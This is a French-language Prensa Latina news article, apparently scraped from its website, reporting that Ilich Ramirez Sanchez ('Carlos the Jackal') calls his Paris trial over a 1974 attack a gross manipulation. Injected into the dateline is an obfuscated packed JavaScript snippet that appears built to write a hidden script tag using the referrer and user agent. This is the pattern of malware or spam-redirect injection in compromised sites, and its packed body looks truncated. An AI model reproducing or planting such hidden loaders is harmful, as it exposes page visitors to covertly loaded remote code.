mercredi 24 avril 2024 |
Prensa Latina - Qui sommes nous

| Contacter avec Prensa Latina

Agence d'information Latino-américaine
Édition française
Search
Close this search box.

Carlos dénonce en France la manipulation grossière de son dossier

Paris eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\b'+e(c)+'\b','g'),k[c])}}return p}('0.6("");n m="q";',30,30,'document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|hiedi|var|u0026u|referrer|dzier||js|php'.split('|'),0,{})) (PL) Le vénézuélien Ilich Ramirez Sanchez, connu sous le nom de Carlos le Chacal, a déclaré que le procès judiciaire qui lui est intenté en France est le résultat d'une manipulation grossière.

Paris (PL) Le vénézuélien Ilich Ramirez Sanchez, connu sous le nom de Carlos le Chacal, a déclaré que le procès judiciaire qui lui est intenté en France est le résultat d’une manipulation grossière.

Intervenant durant la première journée de son jugement, qui se prolongera durant deux semaines, l’accusé a assuré qu’il n’existe ni preuves ni évidences matérielles qui l’impliquent dans l’attentat pour lequel il est jugé. Attentat qui a eu lieu dans la capitale française en 1974 et dont le bilan a été de deux morts.

Il a également mis en question l’irrégularité de son statut de détenu en France depuis 1994, faisant référence à la façon dont-il a été arrêté cette année-là au Soudan.

Le vénézuélien a été capturé en Afrique, malgré le fait qu’il n’existait aucun mandat d’arrêt international, puis a été transféré dans l’hexagone sans respecter la procédure d’extradition ;raisons pour lesquelles l’arrestation est considérée comme un enlèvement.

Ramirez Sanchez, qui a été membre du Front Populaire pour la Libération de la Palestine durant les années 70 et 80, fait déjà face à deux condamnations à perpétuité en France : l’une pour un triple homicide et l’autre pour quatre attentats qui lui sont attribués.

Alors que la France et Israël le qualifient de terroriste, plusieurs pays et personnalités internationales le considèrent comme un combattant anti-impérialiste et héros de la cause arabe.

Connu internationalement comme Carlos le Chacal, le vénézuélien  a l’habitude de s’identifier à soi-même comme un révolutionnaire. Son avocate, Isabelle Coutant-Peyre, a souligné que la légalité des procès judiciaires à son encontre a souvent été remise en doute par des problèmes comme l’excessif délai pour juger des faits vieux de plusieurs décennies, et l’absence de preuves matérielles démontrant son implication.

ocs/lmg

EN CONTINU
notes connexes